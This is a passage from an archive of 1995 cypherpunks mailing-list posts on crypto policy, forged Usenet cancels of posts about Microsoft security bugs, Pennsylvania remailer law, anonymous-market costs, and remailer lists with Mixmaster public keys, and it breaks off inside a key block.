P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 15 Oct 95 19:42:21 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: My chat with Goeff Greiveldinger
In-Reply-To: <Pine.SUN.3.91.951015221121.29505A-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.91.951015223954.5441C-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Those seeking more info on the conference will find it at:
Http://www.multicorp.com/wec.  

They are asking over $500 in registration fees, which strikes me as wildly 
excessive, so I'm not advocating attendence.

The third member of my panel, Frank Sudia of Banker's Trust has pulled 
out, so don't believe everthing you read either.  I might post the 
outline of my talk in a day or two if I get around to translating my 
cryptic jottings into ASCII.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 15 Oct 95 22:42:59 PDT
To: cypherpunks@toad.com
Subject: Bug Bounty [noise]
Message-ID: <199510160542.WAA09463@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Something I noticed about the Netscape Bug Bounty that seems to not have
been mentioned here...

        "Linux users need not apply."

(Check the rules as to which versions qualify and see what I mean.)
|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sun, 15 Oct 95 20:00:49 PDT
To: anonymous@replay.com (Nobody in particular)
Subject: Re: Illegally canceled articles on Microsoft Security Bugs
In-Reply-To: <199510160231.TAA10813@Networking.Stanford.EDU>
Message-ID: <9510160300.AA27823@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Hi,

	I would discount the possibility of the cancellations being by a
Microsoft employee. I spoke to a very senior Microsoft person who was well
aware that security of Microsoft products would be examined and that chances 
are that bugs would be found. Point being that they would much prefer the
to be discovered by people who tell them about the bugs rather than people
who aim to exploit them.

	If you have pissed of the Church of Satan then what do you expect?
They will get what is comming to them sooner or later and I expect that it 
will take judicial and unpleasant form.

		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Charles Graves <llurch@networking.stanford.edu>
Date: Sun, 15 Oct 95 23:29:26 PDT
To: postmaster@microsoft.com
Subject: Forged cancels of posts critical of Microsoft, *apparently* through internetmci.com or nasa.gov
Message-ID: <199510160629.XAA11766@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

These are the forged cancels for my articles critical of Microsoft. *Many
Thanks* to the person who forwarded them to me; our server expires control
way too fast.

Somebody did an acceptable forge on the Message-ID, but the Path is quite
wrong. Can anybody help me catch this fool? I'm somewhat out of my element
here.

The most serious posts are available on the Web at
http://www-leland.stanford.edu/~llurch/win95netbugs/IP-Security-Bug.txt.asc,
and on the gopher archive at gopher://quixote.stanford.edu/1m/win95netbugs.

- -rich graves
 networking systems
 stanford university
 llurch@networking.stanford.edu


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIH0IIND7LjhcPQ9AQFojQP/UrB/Us1PK8ne1GnsFxqXXVCJpanEKciH
p9wqVMfBJOTBdkYBHkuSHkdeaJfXz6QfEQYGZr6HIN/DD8A/VNOSB+dgCbBUYcOj
2/b+x+7CBfGvEsrbIVLxWl/Eua5pIcjWLLmfgYu3dCneDOqrXO9ehZSDg1JD9tTt
Av6lQIxTuVM=
=V+nf
-----END PGP SIGNATURE-----

[You always think of something after signing, don't you?]
Also emailed to postmaster@internetmci.com and  postmaster@news.msfc.nasa.gov. 
Was that right? Doesn't microsoft.com get its news feed from internetmci? 
OK, I'll Cc them, because I know they don't want anyone to believe that 
this was done by a Microsoft employee.

The cancel for 
<Pine.ULT.3.91.951013145012.29858A-100000@Networking.Stanford.EDU>, only,
is legitimate, and provides a very good comparison. I'm sure the forger 
studied it; so should we.

Path: rand.org!usc!howland.reston.ans.net!swrinde!elroy.jpl.nasa.gov!sdd.hp.com!
hplabs!unix.sri.com!news.Stanford.EDU!not-for-mail
From: llurch@Networking.Stanford.EDU (Richard Charles Graves)
Newsgroups: comp.os.ms-windows.win95.misc,comp.infosystems.www.browsers.ms-windo
ws,comp.os.ms-windows.apps.winsock.misc,alt.winsock,comp.os.ms-windows.networkin
g.tcp-ip,comp.protocols.tcp-ip.ibmpc
Subject: cmsg cancel <Pine.ULT.3.91.951013145012.29858A-100000@Networking.Stanfo
rd.EDU>
Control: cancel <Pine.ULT.3.91.951013145012.29858A-100000@Networking.Stanford.ED
U>
Date: 13 Oct 1995 15:55:40 -0700
Organization: Stanford University
Lines: 1
Message-ID: <45mqpc$hn@Networking.Stanford.EDU>
NNTP-Posting-Host: networking.stanford.edu

<Pine.ULT.3.91.951013145012.29858A-100000@Networking.Stanford.EDU> was cancelled
 from within trn.

Path: rand.org!usc!howland.reston.ans.net!newsfeed.internetmci.com!news.msfc.nas
a.gov!elroy.jpl.nasa.gov!sdd.hp.com!hplabs!unix.sri.com!news.Stanford.EDU!not-fo
r-mail
From: llurch@Networking.Stanford.EDU (Richard Charles Graves)
Newsgroups: comp.os.ms-windows.win95.misc,comp.infosystems.www.browsers.ms-windo
ws,comp.os.ms-windows.apps.winsock.misc,alt.winsock,comp.os.ms-windows.networkin
g.tcp-ip,comp.protocols.tcp-ip.ibmpc
Subject: cmsg cancel <Pine.ULT.3.91.951013145012.29858A-100000@Networking.Stanfo
rd.EDU>
Control: cancel <Pine.ULT.3.91.951013145012.29858A-100000@Networking.Stanford.ED
U>
Date: 13 Oct 1995 15:58:14 -0700
Organization: Stanford University
Lines: 1
Message-ID: <45mqu6$iu@Networking.Stanford.EDU>
NNTP-Posting-Host: networking.stanford.edu

<Pine.ULT.3.91.951013145012.29858A-100000@Networking.Stanford.EDU> was cancelled
 from within trn.

Path: rand.org!usc!howland.reston.ans.net!newsfeed.internetmci.com!news.msfc.nas
a.gov!elroy.jpl.nasa.gov!sdd.hp.com!hplabs!unix.sri.com!news.Stanford.EDU!not-fo
r-mail
From: llurch@Networking.Stanford.EDU (Richard Charles Graves)
Newsgroups: control,comp.protocols.tcp-ip.ibmpc,comp.os.ms-windows.networking.tc
p-ip
Subject: cmsg cancel <Pine.ULT.3.91.951013145012.29858A-100000@Networking.Stanfo
rd.EDU>
Control: cancel <Pine.ULT.3.91.951013145012.29858A-100000@Networking.Stanford.ED
U>
Date: 13 Oct 1995 16:00:48 -0700
Organization: Stanford University, CA 94305, USA
Lines: 1
Message-ID: <45mr30$kh@Networking.Stanford.EDU>
NNTP-Posting-Host: networking.stanford.edu

cancel <Pine.ULT.3.91.951013145012.29858A-100000@Networking.Stanford.EDU>

Path: rand.org!usc!math.ohio-state.edu!uwm.edu!lll-winken.llnl.gov!fnnews.fnal.g
ov!unixhub!news.Stanford.EDU!not-for-mail
From: llurch@Networking.Stanford.EDU (Richard Charles Graves)
Newsgroups: comp.os.ms-windows.win95.misc,comp.os.ms-windows.win95.setup,comp.os
.ms-windows.apps.winsock.mail,comp.os.ms-windows.apps.winsock.misc,comp.os.ms-wi
ndows.apps.winsock.news
Subject: cmsg cancel <45nvip$ab6@nntp.Stanford.EDU>
Control: cancel <45nvip$ab6@nntp.Stanford.EDU>
Date: 14 Oct 1995 02:32:23 -0700
Organization: Stanford University
Lines: 1
Message-ID: <45o038$3ip@Networking.Stanford.EDU>
NNTP-Posting-Host: networking.stanford.edu

<45nvip$ab6@nntp.Stanford.EDU> was cancelled from within trn.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sun, 15 Oct 95 22:06:02 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: alt.paranoia.pgp.ban: long rerun (was Re: My chat with...)
In-Reply-To: <Pine.SUN.3.91.951015221121.29505A-100000@polaris.mindport.net>
Message-ID: <Pine.3.89.9510152224.H11124-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 15 Oct 1995, Black Unicorn wrote:

> in place.  Here that piece is, obviously, banning tomorrow's pgp.

Frankly I think that's what it would take for everyone to start using it
(not that I would on this multiuser account, that's what winsock and my pc 
are for). Just look at lsd, until it became illegal, only researchers and 
psychiatric patients took it. Strange things like crypto really become 
popularized (even through notoriety) when they "shouldn't" be had. Also 
seems like the only way to get any mainstream press. Bad press is better than 
next to none. BBrother schemes like clipper also generate lotsa mainstream
press. I can't wait for Freeh and Clinton to start making sweet 
releases about the sequel. Big ones. What's going on on that front anyway?

> > except as PR, why DO they still take this seriously? (unless you want to 
> > be paranoid about a ban, hmm, nevermind, debated-to-death)
> 
> I'm not so sure it's paranoid.  You have trial baloons floating all 
> over.  Freeh is a prime example, and no one is screaming loudly enough to 
> shoot down his blump.  That's a big'ole green light for regulators.> 
> 
Being paranoid is a prerequisite for being on this list in the first 
place :-)
But seriously, yes I do agree with you. We know just how much they'd love
to get rid of it. That being said, wasn't legal protection for crypto the 
reason EFF caved on the dreaded DT bill? (sorry, DT law. Yech, that's tough)
First they're going to have to get rid of that. How strong is the protection 
anyway? 

*Begin flogging dead horse* (not a Unicorn)
Flog

Fine, let's just say I don't think I it can stick, we could argue this 
back and forth and I'm sure it's been done before. We benefit from any
move towards a ban through a measure of publicity. We benefit once again 
from a ban due to programmers like Phil Z. getting terrified and outraged
enough to write code. PGP is the product of a previous attempted ban.
We'd be have PEM or RIPEM otherwise (with no-one using them). 
Flog

If there is a market to avoid american anti-privacy and subpeona regs, openly 
or in the black, this is where it will get its start. I understand that key 
signing parties are all the rage at ietf meetings. I think a lot of those 
people would be angry enough to go for a strong privacy IP before any ban 
went into effect. Remember the US is not the whole of the world. Go to 
Anguila or Vancouver or Montreal or Baja Cali...with those thoughts in your 
head, and you can have your cpunk ietf meeting and implement and 
distribute the code. 
Flog Flog Flog

And then there's the courts...

I think any ban of a "desirable" product is self defeating. Just look at how 
little popular and even police support the marijuana ban has. Even Newt 
admits to having tried. Unlike crypto, marijuana has a physical presence 
and requires transportation, even then it's also totally unenforceable 
(even though it lands a very large amount of people in jail). A lot of people 
OTOH support the ban on cocaine, yet somehow, supposedly crack only costs 
$5/vial in NYC, and is available in every city in the world. A crypto ban 
would be even harder than making people pay for all their software. 
Pirate software is illegal in most of the world. Are the fine legislators of 
North America, where practically all the software is written, totally innocent 
of this heinous crime?

It can't stick. Either outcome puts crypto and anonymity ahead in some way.

End of dead horse flogging. Sigh. Sorry for an overlong post. 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@dg.thepoint.net>
Date: Sun, 15 Oct 95 22:08:52 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: PA Remailer Concerns
In-Reply-To: <aca715081d0210044fe2@[205.199.118.202]>
Message-ID: <Pine.D-G.3.91.951016010818.18734D-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Oct 1995, Timothy C. May wrote:

> At 2:13 AM 10/16/95, Futplex wrote:
> 
> >I would very much like to see this law tested. I think it could prove fairly
> >important to attack it with a well-planned, benign test case rather than wait
> >for the next National Liberation spam or a death threat.
> >
> >I don't live in PA, but I would be willing to participate as the defendant in
> >a test case under the right circumstances. Presumably I would open an
> >account with an ISP in Penna., set up a remailer on the account (need to find
> >an ISP that clearly allows that), and have somebody send a message through it.
> >
> >We would need to design a promising test case and find an attorney willing &
> >able to offer pro bono services.
> 
> I'm not a lawyer, though I hang out on the "Cyberia" list and I watched a
> lot of the OJ trial. :-}
> 
> Seriously, it is hard to "design a promising test case" in this way.
> They--the Pennsylvania law enforcement authorities--don't have to take the
> bait. They can just do nothing, until an incident arises which provokes
> them. Maybe next year, maybe five years from now. Such an incident is
> likely to be one that they figure will make for a popular prosecution. One
> of the Four Horseman, probably.

I must've missed that day from the O.J. trial.  You are, of course, 
correct that you can't force the state to prosecute you.  You might try 
the following, however, depending on Pennsylvania law (where I am not 
admitted, this isn't legal advice, you aren't my client, and all that 
other crap ...):

Let's say someone decided to set up a commercial remailing service and 
had an aunt with an empty bedroom, phone lines, and a powerful computer 
which she only used to save her recipes.  She happens to live in 
Pennsylvania, near an ISP that allows remailers ...  She offers to help.

You obtain the service of Pennsylvania counsel to advise you on the legal 
aspects of your proposed service.  The lawyer refers you to the new 
statute and says it may be a problem.

Your proposal's success or failure rides on the interpretation of the 
statute. So you instruct your lawyer to review the possibility of filing 
a civil suit for declaratory relief concerning the constitutionality of 
the statute and the interpretation of the statute.  Your civil complaint 
frames the terms of the (public) debate and is the subject of any initial 
press coverage before the Pa. Attorney General has even heard of the suit....


 
> --Tim May
> 
> Views here are not the views of my Internet Service Provider or Government.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Mon, 16 Oct 95 01:18:51 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: transaction costs in anonymous markets
Message-ID: <Pine.SUN.3.91.951016011355.2241A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Some people have predicted (advocated?) frictionless capitalism, which 
will be brought about by the use of digital technology to reduce transaction 
costs.  However, in anonymous markets these costs may be quite high.  
Two main components of transaction cost in an anonymous market will be 
the cost to maintain anonymity and the cost to evaluate reputations.

Maintaining anonymity requires that communications be done through 
special untraceable protocols.  The current state-of-art (i.e. 
RemailerNet) adds several hours of transmition time to each message to 
achieve effective untraceability.  Contract negotiation, for example, 
becomes very difficult under these circumstances.  Untraceable 
communications also use up more computing and communications resources.  
Although remailers don't yet charge any money to pass along messages, 
this is sure to change in the future.  Unless the structure of the 
Internet is completely redesigned, untraceable messages will always cost 
more than traceable ones, although I hope this cost difference can be 
reduced through technical advances.

The second big part of transaction cost in an anonymous market is 
reputation evaluation.  Of course, normal, everyday transactions require 
reputations to be evaluated.  However, more effort and cost will be 
expanded on these evaluations in an anonymous market because the effects 
of misevaluations will be much more damaging.  Reputations must be 
constantly reevaluated, as pseodonyms are easily transfered.  Since no 
good theories of reputation currently exist, these evaluations are 
difficult to automate.  Perhaps theoretical advances can make these 
evaluations easier and/or more accurate.  However there does not appear 
to be any major research effort in this area.

If these costs remain high, but anonymous markets develop regardless, it 
will be interesting to see how these costs affect the structure of the 
markets.  Will special protocols for contract negotiations develop to 
minimize the number of round-trip messages?  Will each market be 
dominated by a few big entities because people can't keep track of 
reputations of many smaller players?  But then how will these big 
entities be organized?

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 16 Oct 95 03:30:46 PDT
To: cypherpunks@toad.com
Subject: MUZ_zle
Message-ID: <199510161030.GAA01063@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-16-95. NYPaper:


   "The New Watchdogs of Digital Commerce."

      Think of them as a truth squad of cyberspace, these
      crusading graduate-student hackers from Berkeley. "This
      is a tradition of unfettered inquiry and curiosity,"
      said John Gilmore, "for hackers, nothing is sacred and
      everything is subject to verification before you can
      really believe it."

      "The hacker ethic is transferring some of its better
      lessons to the world of commerce," said Steven Levy,
      "we're groping for a way to use the Net in a way where
      information will flow freely and people can still make
      money. The hackers are going to help us find ways to
      have a more humanized system of commerce."


   "Will Netscape be the next Microsoft, or the next victim of
   Microsoft?"

      Some investors believe Netscape could become "the next
      Microsoft." Other people believe that Netscape could
      become the next Microsoft victim, and that the next
      Microsoft is none other than Microsoft itself.

      All these new features of Navigator 2.0 send a clear
      notice to the industry that Netscape has no interest in
      bowing to the traditional Internet procedures for
      setting software standards by academic and scientific
      committee. The Internet has become primarily a
      commercial medium, where standards are set by whoever
      has the highest market share. It is a concept Microsoft
      knows well, and one that Netscape has grasped.


   MUZ_zle  (16 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 16 Oct 95 06:51:48 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199510161351.GAA02832@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ncognito"} = "<ncognito@gate.net> cpunk";
$remailer{"precip"} = "<mixmaster@mix.precipice.com> cpunk mix pgp hash latent cut ek reord";
$remailer{"ecafe"} = "<remail@ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
replay   remailer@replay.com              +-**+*+*****    10:11  99.96%
ideath   remailer@ideath.goldenbear.com   --.--------   5:23:14  99.81%
mix      mixmaster@remail.obscura.com     +--+---+ --   1:32:40  99.24%
hacktic  remailer@utopia.hacktic.nl       +-**-***   *    12:11  99.06%
portal   hfinney@shell.portal.com         #-####*   **     3:14  99.02%
alumni   hal@alumni.caltech.edu            -***  +  +*     8:12  98.64%
bsu-cs   nowhere@bsu-cs.bsu.edu            -#+#**#   *    13:10  98.50%
vishnu   mixmaster@vishnu.alias.net       *-+**   * **    11:44  98.49%
rmadillo remailer@armadillo.com           +-+- +++ +++    49:21  98.47%
ecafe    remail@ecafe.org                 #--*-++-        12:28  98.33%
penet    anon@anon.penet.fi               -- +- -  -++  2:32:53  97.85%
syrinx   syrinx@c2.org                    +-+ ---- --+  1:49:27  97.81%
spook    remailer@valhalla.phoenix.net    +- +*+ ** **    27:04  97.74%
wmono    wmono@valhalla.phoenix.net       *-+ ** * ***    12:20  97.69%
flame    remailer@flame.alias.net         +-**   + ***    29:29  95.55%
gondolin mixmaster@gondolin.org           _____.-*-    30:45:37  94.88%
c2       remail@c2.org                    +-+  +++  ++  1:13:25  94.79%
extropia remail@extropia.wimsey.com       ..------ --   5:32:18  94.02%
rahul    homer@rahul.net                    # +-+*# **     4:39  99.20%
ford     remailer@bi-node.zerberus.de          --. --  10:53:23  76.55%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Mon, 16 Oct 95 05:06:20 PDT
To: Mixmaster Mailing List <cypherpunks@toad.com
Subject: Weekly MixMaster list
Message-ID: <Pine.BSD.3.91.951016065746.5906A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

	Here is the current type2.list/pubring.mix as it stands on
vishnu.alias.net. Please note that the email addresses for
mixmaster@spook.alias.net and wmono@spook.alias.net have changed. These
addresses NO LONGER WORK! Please make note of the new addresses. 

type2.list

vishnu mixmaster@vishnu.alias.net bb460f08811a98682def423d30852d11 2.0
spook remailer@valhalla.phoenix.net ca8c8679f7b1cbdcff46d780fba97673 2.0
flame remailer@flame.alias.net 64bbf500097b541a8ddcb2dd80373238 2.0b11
anon mixmaster@anon.alias.net e3ca4cc5beb9934ae6d52dd27da80332 2.0.2b
secrets secret@secret.alias.net bc2e4251dbddfa74dfae8b274904c2be 2.0.2b
wmono wmono@valhalla.phoenix.net f68e6add16880b60eb48a4a4330e2e36 2.0.1
mix mixmaster@obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1
knight mixmaster@aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33 2.0
robomix robo@c2.org 3d523f1fd30b5a1c57214960a00f1c4e 2.0b11
syrinx syrinx@c2.org 6c4e7372e84d7092e0d0e69c20d5be46 2.0b11
rebma mixer@rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11
replay remailer@replay.com e3e2b4d67314b6165ee03b0b0ae07a7f 2.0b11
hacktic remailer@utopia.hacktic.nl bf61835a7b3cfa59c409caeab4e8a222 2.0b11
crynwr remailer@crynwr.com 64c62de6b347b3050fbb6e94c649112d 2.0b11
gondolin mixmaster@gondolin.org 1d767b08fefa0a79d508be73e472d326 2.0.1
q q@c2.org c44e1cb0f0709465c21b07ac972bf973 2.0.1
Armadillo remailer@armadillo.com 7251877ae6fed509ebf7567715974d1b 2.0.1

pubring.mix

mix mixmaster@obscura.com db91418edac3a4d7329feaee0b79c74f 2.0.1

- -----Begin Mix Key-----
db91418edac3a4d7329feaee0b79c74f
258
AATL25WGQY5CMM0/xBjYtuN6IT75h+aBQwwKqZZc
isOrqdsl8HWAzARrB0iAtcr34c2qqPBzSRNa5UE8
d3jOYu/wp9K9M5abUSRogcDl7gkPlqxc+e72SdKd
2Gdgib8VDGVLpJdaPk4uSY/pkmsYB30OaQH3W8dU
PPciTvSJKAYcTQAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

vishnu mixmaster@vishnu.alias.net bb460f08811a98682def423d30852d11 2.0b11

- -----Begin Mix Key-----
bb460f08811a98682def423d30852d11
258
AAShg2h4xGHueryUFNsFBbtSGZBcj+oDImFMkOZA
EQPcbeG6ReEnTnoQ8HBgwtx9isMT9hZ93lBaRY07
ygupHQRi6f+FnlQEZTKqOe+8E+WyDx+ox/1ywgt+
KGFOW+t8WRXA/loKuqD0KH4pwpe7FYE0arGbtm4J
EscGM2DE3TeS3QAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

knight mixmaster@aldebaran.armory.com 6bb0d89a29fd188c67b8e04516b5af33 2.0

- -----Begin Mix Key-----
6bb0d89a29fd188c67b8e04516b5af33
258
AATOSyg7N2PVg9VgA8voDWglq6ESNBLqH0heB2iE
NfvmR/VnyAHCb4ZBtHzvM7ZRBdXYmH/Jt490wg6O
ZCbhcIceFKSsibLEH77+111isAhUbHvn0Nh9gOI7
5ngjOGDQaLQvGUbNHRXQaPAZ0rc4lv9gmChJONOJ
7sFC2J96QR4aewAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

robomix robo@c2.org 3d523f1fd30b5a1c57214960a00f1c4e 2.0b11

- -----Begin Mix Key-----
3d523f1fd30b5a1c57214960a00f1c4e
258
AATQ2zxiRZ5bQuNBKHEvg11R7L69Hc9ZrjTon3o3
s7fbXmuEaiym48sHoRLAttZ3ADuH1FgbuYt1DF+L
Il9Yp5U9znm9MX0rS8xq1iGg7YDED/3x6OWIp7za
17+pWnYmEF+Rz6YZ2o/67ujcBfrJ/odz+SVlaGqF
rWWjaG/oWdqWWwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

syrinx syrinx@c2.org 6c4e7372e84d7092e0d0e69c20d5be46 2.0b11

- -----Begin Mix Key-----
6c4e7372e84d7092e0d0e69c20d5be46
258
AATKhnhAIHXRCKZAi2tehJfQ9s+IsVPjEQQk5xwQ
60VXzmgkC2YirmDFeLz1feNgCMd78GkKHYK5p9WM
HBkPNTDPLraJhJLNDHeHqGtqAI4BTHq/lZ/RMyOH
GV/X5TaUEG69IGb2Rl8OnzNWF9fhKwH6PTE+QiQX
kIcxJnVW+yYOpwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
- -----End Mix Key-----

rebma mixer@rebma.mn.org e7d84921298b0aadaf8f050d145ccf03 2.0b11

- -----Begin Mix Key-----
e7d84921298b0aadaf8f050d145ccf03
258
AASjOGqzTLdjweTMiwirrpVNqXj/ODJVyh9pEo5i
